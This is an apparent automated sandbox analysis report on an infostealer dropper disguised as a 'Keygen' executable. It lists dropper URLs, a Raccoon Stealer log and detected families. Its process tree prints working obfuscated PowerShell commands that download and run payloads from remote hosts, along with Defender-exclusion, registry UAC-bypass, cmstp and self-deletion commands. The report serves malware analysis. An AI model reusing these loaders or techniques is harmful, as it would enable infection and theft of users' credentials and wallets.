Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    154s
  • max time network
    163s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (5) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:28:06 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (473 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 2 IoCs
  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 49 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (5) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1504
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\9878.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (5) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Users\Admin\AppData\Local\Temp\9878.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1940
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9878.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1984
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1792
          • C:\Users\Public\osc.exe
            "C:\Users\Public\osc.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2564
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2672
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:2744
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 2744 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\541670892803531\\* & exit
                  8⤵
                    PID:2824
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 2744
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2668
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:2700
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:2828
              • C:\Users\Public\osc.exe
                "C:\Users\Public\osc.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                • Modifies system certificate store
                PID:2764
                • C:\Users\Admin\AppData\Local\Temp\KflFMhcGIe.exe
                  "C:\Users\Admin\AppData\Local\Temp\KflFMhcGIe.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2832
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\KflFMhcGIe.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:784
                • C:\Users\Admin\AppData\Local\Temp\O5gW8ZYuxe.exe
                  "C:\Users\Admin\AppData\Local\Temp\O5gW8ZYuxe.exe"
                  7⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2180
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:2252
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Public\Natso.bat
                        9⤵
                          PID:2508
                          • C:\Windows\SysWOW64\reg.exe
                            reg delete hkcu\Environment /v windir /f
                            10⤵
                            • Modifies registry key
                            PID:1992
                          • C:\Windows\SysWOW64\reg.exe
                            reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                            10⤵
                            • Modifies registry key
                            PID:2412
                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                        8⤵
                          PID:2628
                      • C:\Users\Admin\AppData\Local\Temp\ScYwwBnh7I.exe
                        "C:\Users\Admin\AppData\Local\Temp\ScYwwBnh7I.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:2972
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\yk2omq10.inf
                          8⤵
                            PID:2056
                        • C:\Users\Admin\AppData\Local\Temp\3lNZvo0fRd.exe
                          "C:\Users\Admin\AppData\Local\Temp\3lNZvo0fRd.exe"
                          7⤵
                          • Executes dropped EXE
                          • Windows security modification
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1840
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            8⤵
                            • Suspicious use of AdjustPrivilegeToken
                            PID:796
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\osc.exe"
                          7⤵
                            PID:2836
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              8⤵
                              • Delays execution with timeout.exe
                              PID:1556
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9878.tmp\m1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1832
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1280
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 1
                    3⤵
                    • Delays execution with timeout.exe
                    PID:1812
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\9878.tmp\b.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:2040
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
